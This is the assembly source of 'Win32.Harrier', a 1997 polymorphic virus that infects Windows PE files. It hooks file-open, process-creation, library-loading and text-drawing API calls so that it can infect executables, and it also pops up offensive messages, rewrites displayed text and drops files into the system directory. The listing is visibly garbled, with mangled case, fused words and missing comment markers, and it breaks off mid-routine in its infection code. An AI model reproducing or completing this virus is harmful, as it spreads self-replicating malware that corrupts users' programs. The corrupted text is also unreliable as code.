Win32.harrier
Title HDL - The Pretty Pe Polymorphic Virus.
Page 52,130
;
; * ================================================= =================== *
;! (c) 08-Sep-1997Y by Technorat "95-TH Harrier from Darkland"!
; * ================================================= =================== *
;
Start Coding: 27-Jul-1997Y Ver 2.00A
Still Coding: 04-Sep-1997Y VER 2.01A
Stop Coding: 08-Sep-1997Y Ver 2.01A
Bug Fixing: 10-Sep-1997Y Ver 2.01b
Upgrading: 14-SEP-1997Y VER 2.01B
Bug fixing: 17-SEP-1997Y Ver 2.01!
;
;
Win32 Virus. (C) * TR * SOFT 27-JUL-1997Y
;
Compatible: MS Windows 95 (V4.0 );
Structure: Many Levels Polymorphic Style;
; Infector: Written As Win32 Console Application;
Infect: All Files by Type Newexe (PE);
Check: Attributes, Date & Time, IO Errors, Synchronization
Devil: Text Strings On Screen, Message Boxes, Help,
Control Panel (System Applet);
; LOCK: - = - Nothing - = -
: Pretty fucking style;
;
.386; Party goes.
.Model flat, stdcall
% Nomacs
Include ..harrinc.inc.inc.inc
; ------------------------------------------------- ------------
Data section Must Be present. Data Size Must Be Non-Zero.
.DATA
Dumbo DB 'for Fucking Tasm32 TLINK32 Programs!', 0; -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------
.Code
Public StubenTrylabel; Some Definitions
PUBLIC StubimportPlace; Placed Specially
Public imageplace; for Pelinker
Public CurrentPlace
Public Fixupsplace
Public fixupscounter
Public importPlace
Public importlength
Public bufferplace
; ------------------------------------------------- ------------
Maxpathlen = 260
; ------------------------------------------------- ------------
Cr EQU <0DH, 0AH>; Service MacRoses
Ver EQU
Release EQU
Basedon EQU
; ------------------------------------------------- ------------
Stack Memory Addressing MacRoses
Memcommitsz = 38000H; Stack Memory Size
TinymemCommitsz = 2000H; Warning! Depends on
Total Program size.
_VARADDR = 0; Base of Indexing
Var Macro Varname, Vartype
& Varname catstr, <] [ebp]>; defining the new
IF Type Vartype EQ 0; Variable Reference
_VARADDR = _varaddr Vartype
Else
_VARADDR = _Varaddr Type Vartype
ENDIF
ENDM VAR
; ------------------------------------------------- ------------
Binary Include Support
Bfile Macro Ilabel, IFileName, iFilesize
& Ilabel label Byte
_BFILESTART = $
IRPC Char, IFILENAME
DB '& char'
ENDM
DB (ifilesize - ($ -_ bFileStart) DUP (90h)
ENDM BFILE
; ------------------------------------------------- ------------
DebugmodeKey = 0h; defining the debug
IRPC Char,
DebugmodeKey = (DebugModeKey XOR & CHAR ') - 1) SHL 1
ENDM
; ------------------------------------------------- --------_ JMP Macro Addr; Macroses That Supports
JMP addr; asmswap scrambling
ENDM _JMP
_Nop macro Addr
ENDM _NOP
; ------------------------------------------------- ------------
Here The Start of Running Code.
Start:; Here Can Be Placed
The Polymorphic Decryptor,
And Will Be Placed!
But Later.
Startcode
; Separator = _JMP
; ------------------------------------------------- ------------
Here The Real Virus Body.
Bodyhere: Pusha: Pusha
NEED AFTER DECRYPTING!
Firstcm: Call SecondCM
XOR EAX, Eax; Some Trash
Ret; Will Never Work !!!
SecondCM: XOR Eax, Eax; Some Another Trash
POP EBX; REAL BODY.
SUB EBX, (Offset Firstcm - Offset Start 5)
XOR Eax, Eax; Wait on Semaphore
Waitinit: Xchg Eax, [EBX] [Offset INITOK - OFFSET START]
OR EAX, EAX
JZ Waitinit
CMP EAX, 2H; OK, All Done.
Je Doneinit
Defcodeline
DB 0BEH
FixUpsplace DD?; Mov ESI, XXXX
BreakcoDeline
Defcodeline
DB 0B9H
FixUpsCounter Dd?; Mov ECX, XXXX
BreakcoDeline
Again: Mov EDI, [EBX ESI]
Add [EBX EDI], EBX; Setup ReloItems
Add ESI, 4H
Dec ECX
Jnz Again
Mov Here, EBX
Mov Eax, StubenTrylabel; Calculate The
Add Eax, EBX; Host Entry Point
Sub Eax, Currentplace; and Place It for Future
Sub Eax, Polymorphsz
Mov Hostip, EAX
Sub EBX, CURRENTPLACE
Sub EBX, POLYMORPHSZ
MOV MEMBASE, EBX
Mov Debug, 0h; Checking for Debug
Call getenvironmentstrings....
New_Key: xor EBX, EBX
New_char: cmp byte ptr [eax], 0H; Calculate Hash from
JE CHECK_KEY; ENV. String
XOR BL, [EAX]
Dec EBX
SHL EBX, 1
INC EAX
JMP New_CHAR
Check_key: CMP EBX, DEBUGMODEKEY; Debug Key Detected?
JNE new_string
OR Debug, -1; Yes!
Push 0H; (??? NOT USED)
Call MessageBeep
Push 40h; Okonly InformationPush Offset Infselfheader
Push offset infenterdebug
Push 0h
Call Messageboxa
JMP BREAK_KEYS
New_String: Inc Eax; NO, Next String
CMP Byte Ptr [EAX], 0H
JNE New_Key
Break_keys:
Mov Eax, Offset KernelName; Setup Import Entries
Mov Edx, Offset Krnlimp; on kernel32 and shell32
MOV ECX, KRNLIMPCNT; and COMDLG32 DLLS
Call setupimport
Mov Eax, Offset ShellName
Mov Edx, Offset Shellimp
MOV ECX, ShellImpcnt
Call setupimport
Mov Eax, Offset Dialogname
Mov Edx, Offset Dialogimp
MOV ECX, Dialogimpcnt
Call setupimport
Mov Eax, Offset UserName; And User32 and GDI32 DLLS
MOV EDX, Offset Userimp
MOV ECX, Userimpcnt
Call setupimport
Mov Eax, Offset GDINAME
Mov Edx, Offset GDIIMP
MOV ECX, GDIIMPCNT
Call setupimport
Mov helpcounter, 0h
MOV WSRET $, 0H; Critical Section End.
Doneinit: Mov Initok, 2H; No Writes in Ram Here !!!
Here Can Be Implement Some Initialization Features.
For example: infecting the export in shell32.dll OR
..................
Push Memcommitsz / 4h
Call AllocstackMem
Lea Eax, ft_struc
Push EAX
Call getSystemTime; Get "Random" Value
CMP Word PTR ft_second, 10h
JNE GO_AWAY
Push 1000h; Okonly SystemModal
Push Offset Infselfheader
Push offset hellomsg
Push 0h
Call MessageBoxa; fuck the society ;-)
GO_AWAY: Lea Eax, Packedtime; Initialize Random Generator
Push Eax; Can Be Performed At
Lea Eax, ft_struc; any time, IT is legal !!!
Push EAX
Call SystemTimetOfiletime
Mov Eax, Packedtime
OR EAX, 1H
Mov randseed, EAX
Mov Eax, 10h; by 1/16 probability
Call Random
OR EAX, EAX
Jnz Noinstalloem
Push maxpathlen
Lea eax, somepath; some nice install ;-)
Push Eax; (About the OEM)
Call GetsystemDirectorya
Push Eaxle Eax, SomePath
Add Eax, [ESP]
MOV EDI, EAX; The Pretty logo file
Mov ESI, Offset Bitmapname
CLD
MOV ECX, Bitmapnamel
REP MOVSB
Push 0h
PUSH 10000000H 80H; FAN, FFRA
Push 2H; CA
Push 0h
Push 1h
PUSH 80000000H 40000000H; GR / GW
Lea Eax, SomePath
Push EAX
Call Createfilea
CMP EAX, -1H; CREATE ERROR!
JE Fail_oem
Push EAX
Push 0h
Lea ECX, Processedbytes
Push ECX
Push harrbtmpfile_sz
Push Offset Bitmapfile
Push EAX
Call writefile
Call Closehandle
Lea Eax, SomePath
Add Eax, [ESP]
Mov Edi, Eax; The Pretty Info File
Mov ESI, Offset Infoname
MOV ECX, Infonamel
REP MOVSB
Push 0h
PUSH 10000000H 80H; FAN, FFRA
Push 2H; CA
Push 0h
Push 1h
PUSH 80000000H 40000000H; GR / GW
Lea Eax, SomePath
Push EAX
Call Createfilea
CMP EAX, -1H; CREATE ERROR!
JE Fail_oem
Push EAX
Push 0h
Lea ECX, Processedbytes
Push ECX
Push Harrinfofile_sz
Push Offset Infofile
Push EAX
Call writefile
Call Closehandle
Fail_oem: POP EAX
Noinstalloem: Push Memcommitsz / 4h
Call FreeStackMem
POPA
JMP Hostip; All Done.
; ------------------------------------------------- ------------
Setupimport: MOV EBX, StubimportPlace; Setup Hostimport
Add ebx, Here
SET_3 $: CMP DWORD PTR [EBX] [3 * 4], 0H; (EDX / ECX, EAX)
JE set_0 $; Corrupt All..
MOV ESI, [EBX] [3 * 4]; Scan Stub Modules
Add ESI, MEMBASE
Mov Edi, EAX
CLD
SET_2 $: Call Cmpuncase; Compare Two Module Chars
JNE SET_1 $
CMP BYTE PTR [EDI] [- 1], 0H
JNE SET_2 $; Names Compared OK.
Call set_mdl $; setup current module.
SET_1 $: Add Ebx, 5 * 4; Next Module..
JMP SET_3 $
SET_0 $: RET; Last Module, All Done.
SET_MDL $: Push Eax
MOV ESI, [EBX]; (Current Module in EBX)
OR ESI, ESI; LOOKUP PRESENT?
JZ SET_MDL_1 $
Add ESI, MEMBASE
XOR EAX, EAX
SET_MDL_0 $: CMP DWORD PTR [ESI], 0H; Last Lookup? JE SET_MDL_1 $
Test DWORD PTR [ESI], 80000000H
JNE SET_MDL_2 $; Ordinal?
PUSH ESI
Mov ESI, [ESI]; Get Name in Module
Add ESI, MEMBASE
Add ESI, 2H
Push Edx
Push ECX
SET_MDL_M0 $: Push ESI
MOV EDI, [EDX] [1 * 4]; Get Self Name To Setup
SET_MDL_M2 $: CALL CMPUNCASE
JNE SET_MDL_M1 $
CMP BYTE PTR [EDI] [- 1], 0H
JNE SET_MDL_M2 $; OK, SETUP THIS Entry
MOV EDI, [EBX] [4 * 4]; PTR to AddRTable
Add Edi, MEMBASE
MOV ESI, [EDI] [EAX]; importValue
Push EDI
Mov EDI, [EDX]; Setup _var
MOV [EDI], ESI
POP EDI
MOV ESI, [EDX] [2 * 4]; Setup ImportValue
MOV [EDI] [EAX], ESI; by iProc
POP ESI
JMP SET_MDL_M3 $
SET_MDL_M1 $: POP ESI
Add EDX, 3 * 4; Next Name in List
Dec ECX
JNZ SET_MDL_M0 $
SET_MDL_M3 $: POP ECX
POP EDX
POP ESI
SET_MDL_2 $: Add ESI, 4; Next Name in Module
Add Eax, 4
JMP SET_MDL_0 $
SET_MDL_1 $: POP EAX
RET
Cmpuncase: push eax; cmpsb (with uncase check)
Lodsb
Call Upcase
MOV AH, Al
XCHG ESI, EDI
Lodsb
Call Upcase
XCHG ESI, EDI
CMP AH, Al
POP EAX
RET
Upcase: CMP Al, 'A'; Upcase The Al Register
JB Upcase_0 $
CMP Al, 'Z'
JA Upcase_0 $
SUB Al, 20h
Upcase_0 $: RET
; ------------------------------------------------- ------------
Kernel32 Infected functions realization.
IcreateFilea: Push EBP; CREATEFILEA
MOV EBP, ESP; OPENS or CREATES
Pusha; the file or other
MOV EDX, [EBP] [8]; Resource (Pipe, Device, ETC)
Mov EBX, Offset NcreateFilea
Call infectbyname
POPA
POP EBP
JMP _CREATEFILEA
Iopenfile: Push EBP; OpenFile
MOV EBP, ESP; OPENS or CREATES
Pusha; the file
Mov Edx, [EBP] [8]; [OBSOLETE]
MOV EBX, Offset Nopenfile
Call infectbyname
POPA
POP EBP
JMP _openfile
Imovefilea: Push EBP; Movefilea
MOV EBP, ESP; MOVES or RENAMES
Pusha; The Filemov Edx, [EBP] [8]
Mov EBX, Offset Nmovefilea
Call infectbyname
POPA
POP EBP
JMP _Movefilea
ImovefileExa: Push EBP; Movefileexa
MOV EBP, ESP; MOVES or RENAMES
Pusha; the file
Mov Edx, [EBP] [8]; [Not supported by '95]
Mov EBX, Offset NMOvefileexa
Call infectbyname
POPA
POP EBP
JMP _Movefileexa
ICopyFilea: Push EBP; CopyFilea
MOV EBP, ESP; Copyes
Pusha; the file
MOV EDX, [EBP] [8]
MOV EBX, Offset NcopyFilea
Call infectbyname
POPA
POP EBP
JMP _CopyFilea
I_LOPEN: Push EBP; _LOPEN
MOV EBP, ESP; OPENS
Pusha; the file
Mov Edx, [EBP] [8]; [OBSOLETE]
MOV EBX, OFFSET N_LOPEN
Call infectbyname
POPA
POP EBP
JMP __lopen
Iwinexec: push ebp; Winexec
MOV EBP, ESP; SPAWNS
Pusha; the file
Mov Edx, [EBP] [8]; [OBSOLETE]
MOV EBX, OFFSET NWINEXEC
Call infectbyname
POPA
POP EBP
JMP _WINEXEC
IcreateProcessa:
Push EBP; CREATEPROCESSA
MOV EBP, ESP; SPAWNS
Pusha; the file
MOV EDX, [EBP] [8]
MOV EBX, Offset NcreateProcessa
Call infectbyname
POPA
POP EBP
JMP _CreateProcessa
ILoadLibrarya: Push EBP; LoadLibrarya
MOV EBP, ESP; LOADS THE
Pusha; Library File
MOV EDX, [EBP] [8]
Mov EBX, Offset NLOADLIBRARYA
Call infectbyname
POPA
POP EBP
JMP _LoadLibrarya
ILoadLibraryExa:
Push ebp; loadinglibraryexa
MOV EBP, ESP; LOADS THE
Pusha; Library File
MOV EDX, [EBP] [8]
Mov EBX, Offset NLOADLIBRARYEXA
Call infectbyname
POPA
POP EBP
JMP _LoadLibraryExa
IFindFirstFilea:
Push DWORD PTR [ESP] [8]
Push DWORD PTR [ESP] [8]
Call_findfirstfilea
CMP EAX, -1
JE FINDFIRST_1 $
Push EBP; FindfirstFilea
MOV EBP, ESP; Searches the
Pusha; first file
MOV EDX, [EBP] [0CH]
Add Edx, 0BH * 4
Mov EBX, Offset NfindFirstFilea
Call infectbyname
POPA
POP EBP
Findfirst_1 $: RET 8H
IFindNextFilea:
Push DWORD PTR [ESP] [8] Push DWORD PTR [ESP] [8]
Call_findnextfilea
OR EAX, EAX
JE FINDNEXT_1 $
Push EBP; FINDNEXTFILEA
MOV EBP, ESP; Searches the
Pusha; Next File
MOV EDX, [EBP] [0CH]
Add Edx, 0BH * 4
Mov EBX, Offset NfindNextFilea
Call infectbyname
POPA
POP EBP
Findnext_1 $: RET 8H
; ------------------------------------------------- ------------
Shell32 Infected Functions Realization.
ISHELLEXECUTEA: PUSH EBP; Shellexecutea
MOV EBP, ESP; OPENS or Prints
Pusha; The Specified File
Mov Edx, [EBP] [10h]; Via Registry
Mov EBX, Offset nshellexecutea
Call infectbyname
POPA
POP EBP
JMP _SHELLEXECUTEA
IsHellexecuteEx:
Push EBP; ShellexecuteEx
MOV EBP, ESP;???
Pusha;
MOV EDX, [EBP] [10h]; [undocumented]
Mov ebx, offset nshellexecuteEx
Call infectbyname
POPA
POP EBP
JMP _SHELLEXECUTEEX
IsHellexecuteExa:
Push EBP; ShellexecuteExa
MOV EBP, ESP;???
Pusha;
MOV EDX, [EBP] [10h]; [undocumented]
Mov EBX, Offset NSHellexecuteExa
Call infectbyname
POPA
POP EBP
JMP _SHELLEXECUTEEXA
Ifindexecutablea:
Push EBP; FINDEXECUTABLEA
MOV EBP, ESP; Searches the
Pusha; DDE Server
MOV EDX, [EBP] [8]; Via Registry
MOV EBX, Offset Nfindexecutablea
Call infectbyname; or DDE Requests
POPA
POP EBP
JMP _FINDEXECUTABLEA
; ------------------------------------------------- ------------
COMDLG32 INFECTED FUNCTIONS Realization.
IgetopenFileName:
Push DWORD PTR [ESP] [4]; GetopenFileNamea
Call _GetopenFileName; Returns the name
Push EBP; of Opening File
MOV EBP, ESP
Pusha
MOV EDX, [EBP] [8]
Mov Edx, [EDX] [7 * 4]
Mov EBX, Offset NgetopenFileNamea
Call infectbyname
POPA
POP EBP
Ret 4h
IgetsaveFileName:
Push DWORD PTR [ESP] [4]; GetsaveFileNamea
Call_getsavefilename; returns the name
Push EBP; of Saving Filemov EBP, ESP
Pusha
MOV EDX, [EBP] [8]
Mov Edx, [EDX] [7 * 4]
Mov EBX, Offset NgetsaveFileNamea
Call infectbyname
POPA
POP EBP
Ret 4h
; ------------------------------------------------- ------------
User32 Infected Functions Realization
IdrawTexta: Push Ebx; Draw Text On Screen
MOV EBX, ESP
Push EAX
Pusha
Push TinymemCommitsz / 4h
Call AllocstackMem
Push DWORD PTR [EBX] [5 * 4 4]
Push DWORD PTR [EBX] [4 * 4 4]
MOV ECX, [EBX] [3 * 4 4]
MOV EDX, [EBX] [2 * 4 4]
Call Convertstr
Push ECX
Push Edx
Push DWORD PTR [EBX] [1 * 4 4]
Call_Drawtexta
MOV [EBX] [- 4H], EAX
Push TinymemCommitsz / 4h
Call FreeStackMem
POPA
POP EAX
POP EBX
RET 5 * 4
IdrawTextexa: Push Ebx; Draw Text On Screen
MOV EBX, ESP
Push EAX
Pusha
Push TinymemCommitsz / 4h
Call AllocstackMem
Push DWORD PTR [EBX] [6 * 4 4]
Push DWORD PTR [EBX] [5 * 4 4]
Push DWORD PTR [EBX] [4 * 4 4]
MOV ECX, [EBX] [3 * 4 4]
MOV EDX, [EBX] [2 * 4 4]
Call Convertstr
Push ECX
Push Edx
Push DWORD PTR [EBX] [1 * 4 4]
Call_Drawtextexa
MOV [EBX] [- 4H], EAX
Push TinymemCommitsz / 4h
Call FreeStackMem
POPA
POP EAX
POP EBX
RET 6 * 4
ITAbbedTextOuta:
Push Ebx; Draw Text On Screen
MOV EBX, ESP
Push EAX
Pusha
Push TinymemCommitsz / 4h
Call AllocstackMem
Push DWORD PTR [EBX] [8 * 4 4]
Push DWORD PTR [EBX] [7 * 4 4]
Push DWORD PTR [EBX] [6 * 4 4]
MOV ECX, [EBX] [5 * 4 4]
MOV EDX, [EBX] [4 * 4 4]
Call Convertstr
Push ECX
Push Edx
Push DWORD PTR [EBX] [3 * 4 4]
Push DWORD PTR [EBX] [2 * 4 4]
Push DWORD PTR [EBX] [1 * 4 4]
Call_TabbedTextouta
MOV [EBX] [- 4H], EAX
Push TinymemCommitsz / 4h
Call FreeStackMem
POPA
POP EAX
POP EBX
RET 8 * 4
IWSPrintfa: CMP WSRET $, 0H; Check Semaphore!
JE WSPRINTF_1 $
JMP_WSPrintfa
WSPRINTF_1 $: Pop WSRET $ PUSH OFFSET WSPRINT_0 $
JMP_Wsprintfa; Format Text String
WSPRINT_0 $: Push WSRET $
Push EBX
MOV EBX, ESP
Push EAX
Pusha
Push TinymemCommitsz / 4h
Call AllocstackMem
MOV EDX, [EBX] [1 * 4 4]
MOV ECX, [EBX] [- 4]
Call Convertstr
MOV [EBX] [- 4], ECX
MOV ESI, EDX
MOV EDI, [EBX] [1 * 4 4]
CLD
Call Transfer_Str
Push TinymemCommitsz / 4h
Call FreeStackMem
POPA
POP EAX
POP EBX
MOV WSRET $, 0H
RET
WSRET $ DD 0H
IWVSPrintfa: Push Ebx; Format Text String
MOV EBX, ESP
Push EAX
Pusha
Push TinymemCommitsz / 4h
Call AllocstackMem
Push DWORD PTR [EBX] [3 * 4 4]
Push DWORD PTR [EBX] [2 * 4 4]
Push DWORD PTR [EBX] [1 * 4 4]
Call_wvsprintfa
MOV EDX, [EBX] [1 * 4 4]
MOV ECX, EAX
Call Convertstr
MOV [EBX] [- 4], ECX
MOV EDI, [EBX] [1 * 4 4]
MOV ESI, EDX
CLD
Call Transfer_Str
Push TinymemCommitsz / 4h
Call FreeStackMem
POPA
POP Eax; Function Result
POP EBX
RET 3 * 4
IgetTabbedTextExtenta:
Push Ebx; Get Text Parameters
MOV EBX, ESP
Push EAX
Pusha
Push TinymemCommitsz / 4h
Call AllocstackMem
Push DWORD PTR [EBX] [5 * 4 4]
Push DWORD PTR [EBX] [4 * 4 4]
MOV ECX, [EBX] [3 * 4 4]
MOV EDX, [EBX] [2 * 4 4]
Call Convertstr
Push ECX
Push Edx
Push DWORD PTR [EBX] [1 * 4 4]
Call_Gettabbedtextextenta
MOV [EBX] [- 4H], EAX
Push TinymemCommitsz / 4h
Call FreeStackMem
POPA
POP EAX
POP EBX
RET 5 * 4
IMessageBoxa: Push Ebx; shows the thing message
MOV EBX, ESP
Push EAX
Pusha
Push Memcommitsz / 4h
Call AllocstackMem
Lea Eax, ft_struc
Push EAX
Call getSystemTime; Get "Random" Value
CMP Word PTR ft_second, 10h
Jae Message_none $
Movzx Eax, Word PTR FT_MilliseConds
SHR EAX, 1
XOR EDX, EDX
Mov ECX, Fuckmsgcounter
Div ECX
SHL EDX, 1
SHL EDX, 1
Add Edx, Offset FuckMessages
Mov Edx, [EDX] Push DWORD PTR [EBX] [4 * 4 4]
Push DWORD PTR [EBX] [3 * 4 4]
Push Edx
Push DWORD PTR [EBX] [1 * 4 4]
Call Messageboxa
MOV [EBX] [- 4H], EAX
Push Memcommitsz / 4h
Call FreeStackMem
POPA
POP EAX
POP EBX
RET 4 * 4
Message_none $: Push Memcommitsz / 4h; Legal Call
Call FreeStackMem
POPA
POP EAX
POP EBX
JMP_MessageBoxa
Iwinhelpa: Pusha; Calls the Windows
CMP HelpCounter, 10h; Help System
JB WinHLP_0 $
Push 40h; Okonly Information
Push Offset Infselfheader
Push Offset Infgodhelp
Push 0h
Call Messageboxa
POPA
XOR EAX, EAX
RET 4 * 4
WinHLP_0 $: inc HelpCounter; Legal Call
POPA
JMP _WinHelpa
; ------------------------------------------------- ------------
; GDI32 INFECTED FUNCTIONS Realization
ITextOuta: Push Ebx; Draw Text On Screen
MOV EBX, ESP
Push EAX
Pusha
Push TinymemCommitsz / 4h
Call AllocstackMem
MOV ECX, [EBX] [5 * 4 4]
MOV EDX, [EBX] [4 * 4 4]
Call Convertstr
Push ECX
Push Edx
Push DWORD PTR [EBX] [3 * 4 4]
Push DWORD PTR [EBX] [2 * 4 4]
Push DWORD PTR [EBX] [1 * 4 4]
Call_Textouta
MOV [EBX] [- 4H], EAX
Push TinymemCommitsz / 4h
Call FreeStackMem
POPA
POP EAX
POP EBX
RET 5 * 4
IEXTTEXTOUTA: PUSH EBX; Draw Text On Screen
MOV EBX, ESP
Push EAX
Pusha
Push TinymemCommitsz / 4h
Call AllocstackMem
Push DWORD PTR [EBX] [8 * 4 4]
MOV ECX, [EBX] [7 * 4 4]
MOV EDX, [EBX] [6 * 4 4]
Call Convertstr
Push ECX
Push Edx
Push DWORD PTR [EBX] [5 * 4 4]
Push DWORD PTR [EBX] [4 * 4 4]
Push DWORD PTR [EBX] [3 * 4 4]
Push DWORD PTR [EBX] [2 * 4 4]
Push DWORD PTR [EBX] [1 * 4 4]
Call _extTextouta
MOV [EBX] [- 4H], EAX
Push TinymemCommitsz / 4h
Call FreeStackMem
POPA
POP EAX
POP EBX
RET 8 * 4
IgetTexTextentPointa:
Push Ebx; Get Text Parameters
MOV EBX, ESP
Push Eaxpusha
Push TinymemCommitsz / 4h
Call AllocstackMem
Push DWORD PTR [EBX] [4 * 4 4]
MOV ECX, [EBX] [3 * 4 4]
MOV EDX, [EBX] [2 * 4 4]
Call Convertstr
Push ECX
Push Edx
Push DWORD PTR [EBX] [1 * 4 4]
Call_GettexTextentPointa
MOV [EBX] [- 4H], EAX
Push TinymemCommitsz / 4h
Call FreeStackMem
POPA
POP EAX
POP EBX
RET 4 * 4
IgetTexTextentPoint32a:
Push Ebx; Get Text Parameters
MOV EBX, ESP
Push EAX
Pusha
Push TinymemCommitsz / 4h
Call AllocstackMem
Push DWORD PTR [EBX] [4 * 4 4]
MOV ECX, [EBX] [3 * 4 4]
MOV EDX, [EBX] [2 * 4 4]
Call Convertstr
Push ECX
Push Edx
Push DWORD PTR [EBX] [1 * 4 4]
Call _GettextextentPoint32a
MOV [EBX] [- 4H], EAX
Push TinymemCommitsz / 4h
Call FreeStackMem
POPA
POP EAX
POP EBX
RET 4 * 4
IgetTexTextentExpointa:
Push Ebx; Get Text Parameters
MOV EBX, ESP
Push EAX
Pusha
Push TinymemCommitsz / 4h
Call AllocstackMem
Push DWORD PTR [EBX] [7 * 4 4]
Push DWORD PTR [EBX] [6 * 4 4]
Push DWORD PTR [EBX] [5 * 4 4]
Push DWORD PTR [EBX] [4 * 4 4]
MOV ECX, [EBX] [3 * 4 4]
MOV EDX, [EBX] [2 * 4 4]
Call Convertstr
Push ECX
Push Edx
Push DWORD PTR [EBX] [1 * 4 4]
Call_GettextExtentExpointa
MOV [EBX] [- 4H], EAX
Push TinymemCommitsz / 4h
Call FreeStackMem
POPA
POP EAX
POP EBX
Ret 7 * 4
; Separetor = _nop
; ------------------------------------------------- ------------
Shellname DB 'Shell32.dll', 0; Name of Import
KernelName DB 'Kernel32.dll', 0; Providers
Dialogname DB 'COMDLG32.DLL', 0
Username DB 'User32.dll', 0
GDinaMe DB 'GDI32.DLL', 0
; ------------------------------------------------- ------------
_Createfilea dd?; Thunk pointers
_Openfile dd?; (Kernel)
_Movefilea dd?
_MOVEFILEXA DD?
_Copyfilea dd?
__lopen dd? _winexec dd?
_Createprocessa dd?
_LoadLibrarya DD?
_LoadLibraryExa DD?
_Findfirstfilea dd?
_Findnextfilea dd?
_SHELLEXECUTEA DD?; (Shell)
_SHELLEXECUTEEX DD?
_SHELLEXECUTEEXA DD?
_Findexecutablea dd?
_GETOPENFILENAMEA DD?; (Commmdlg)
_GetsaveFileNamea DD?
_DRAWTEXTA DD?; (USER)
_DRAWTEXTEXA DD?
_TabbedTextOuta DD?
_wsprintfa dd?
_WVsPrintfa DD?
_GETTABBEDTEXTEXTENTA DD?
_MessageBoxa DD?
_Winhelpa dd?
_TEXTOUTA DD?; (GDI)
_EXTTEXTOUTA DD?
_GettexTextentPointa DD?
_GettextextentPoint32a dd?
_GettexTextenTexPointa DD?
; ------------------------------------------------- ------------
NcreateFilea DB 'Createfilea', 0; Thunk Pointer Names
Nopenfile DB 'OpenFile', 0
Nmovefilea DB 'Movefilea', 0
NmovefileExa DB 'Movefileexa', 0
NcopyFilea DB 'Copyfilea', 0
N_lopen db '_lopen', 0
Nwinexec DB 'Winexec', 0
NcreateProcessa DB 'CreateProcessa', 0
NLOADLIBRARYA DB 'LOADLIBRARYA', 0
NLOADLIBRARYEXA DB 'LOADLIBRARYEXA', 0
Nfindfirstfilea DB 'FindfirstFilea', 0
NFINDNEXTFILEA DB 'FINDNEXTFILEA', 0
NSHELLEXECUTEA DB 'SHELLEXECUTEA', 0
NSHELLEXECUTEEX DB 'Shellexecuteex', 0
NSHELLEXECUTEEXA DB 'SHELLEXECUTEEXA', 0
NFINDEXECUTABLEA DB 'FINDEXECUTABLE', 0
NgetopenFileNamea DB 'getopenfilenamea', 0
Ngetsavefilenamea DB 'getsavefilenamea', 0
NdrawTexta DB 'DrawTexta', 0
NDrawTextexa DB 'DrawTextexa', 0
NTABBEDTEXTOUTA DB 'TabbedTextOuta', 0
NWSPRINTFA DB 'WSPRINTFA', 0
NWVSPRINTFA DB 'WVSPRINTFA', 0
NgetTabbedtextextenta DB 'getTabbedTextExtenta', 0
NMessageBoxa DB 'MessageBoxa', 0
Nwinhelpa DB 'Winhelpa', 0nTextOuta DB 'TextOuta', 0
NextTextOuta DB 'EXTTEXTOUTA', 0
NgettextextentPointa DB 'gettextextentpointa', 0
NgettextextentPoint32a db 'gettextextentpoint32a', 0
NgettextextentExpointa db 'gettextextentexpointa', 0
; ------------------------------------------------- ------------
Defcodeline
KRNLIMP LABEL DWORD
DD offset _createfilea
DD Offset NcreateFilea
DD Offset IcreateFilea
DD offset _openfile
DD Offset Nopenfile
DD Offset Iopenfile
DD Offset _Movefilea
DD Offset NMOVEFilea
DD Offset Imovefilea
DD Offset _Movefileexa
DD Offset Nmovefileexa
DD Offset Imovefileexa
DD offset _copyfilea
DD Offset NcopyFilea
DD Offset icopyfilea
DD offset __lopen
DD offset n_lopen
DD Offset I_lopen
DD Offset _winexec
DD Offset Nwinexec
DD Offset Iwinexec
DD offset _createprocessa
DD Offset NcreateProcessa
DD Offset IcreateProcessa
DD Offset _LoadLibrarya
DD Offset NLOADLIBRARYA
DD Offset iLoadLibrarya
DD Offset _LoadLibraryExa
DD Offset NLOADLIBRARYEXA
DD Offset iLoadLibraryExa
DD offset _findfirstfilea
DD Offset NfindFirstFilea
DD offset ifindfirstfilea
DD offset _findnextfilea
DD Offset NfindNextFilea
DD Offset ifindnexTfilea
KRNLIMPCNT = ($ - offset kRnlimp) / (3 * 4)
BreakcoDeline
Defcodeline
Shellimp Label DWORD
DD Offset _SHELLEXECUTEA
DD offset nshellexecutea
DD Offset ishellexecutea
DD Offset _SHellexecuteEx
DD Offset NSHellexecuteEx
DD Offset ishellexecuteEx
DD Offset _SHellexecuteExa
DD Offset nshellexecuteExa
DD Offset ishellexecuteExa
DD offset _findexecutablea
DD Offset NfINDexecutablea
DD Offset Ifindexecutablea
ShellImpcnt = ($ - offset shellimp) / (3 * 4)
BreakcoDeline
Defcodeline
Dialogimp label dwordddd offset _GetopenFileNamea
DD Offset NgetopenFileNamea
DD Offset IgetopenFileNamea
DD offset _getsavefilenamea
DD Offset NgetsaveFileNamea
DD Offset IgetsaveFileNamea
Dialogimpcnt = ($ - offset dialogimp) / (3 * 4)
BreakcoDeline
Defcodeline
Userimp label dword
DD Offset _DrawTexta
DD Offset NDRAWTEXTA
DD Offset iDrawTexta
DD Offset _Drawtextexa
DD Offset NdrawTextexa
DD Offset iDrawTextexa
DD Offset _TabbedTextouta
DD Offset NTABBEDTEXTOXTATA
DD Offset ItabbedTextouta
DD Offset_wsprintfa
DD Offset NWSPRINTFA
DD Offset IWSPRINTFA
DD Offset_WVsPrintfa
DD Offset NWVSPrintfa
DD Offset IWVSPrintfa
DD Offset _GetTabbedTexTextenta
DD Offset NgetTabbedTextExtenta
DD Offset IgetTabbedTextExtenta
DD Offset _MessageBoxa
DD Offset NMessageBoxa
DD Offset IMESSAGEBOXA
DD Offset _winhelpa
DD Offset Nwinhelpa
DD Offset IwinHelpa
Userimpcnt = ($ - offset userimp) / (3 * 4)
BreakcoDeline
Defcodeline
GDIIMP LABEL DWORD
DD Offset_Textouta
DD Offset NTextouta
DD Offset ITextouta
DD offset _extTextouta
DD Offset NextTextouta
DD Offset IExtTextouta
DD Offset _GettexTextentPointa
DD Offset NgetTexTextentPointa
DD Offset IgetTexTextentPoint
DD Offset _GettextExtentPoint32a
DD Offset NgetTexTextentPoint32a
DD Offset IgetTexTextentPoint32a
DD Offset _GettextextentExpointa
DD Offset NgetTexTextentExpointa
DD Offset IgetTexTextentExpointa
GDIIMPCNT = ($ - offset gdiimp) / (3 * 4)
BreakcoDeline
; Separator = _JMP
; ------------------------------------------------- ------------
Infector Routines
Infectbyname: Push Memcommitsz / 4H
Call AllocstackMem; Infect File by Name in EDX
CMP Debug, 0H; (WHO IN EBX)
JE Infect_0 $
OR EDX, EDX
JNE INFECT_D $
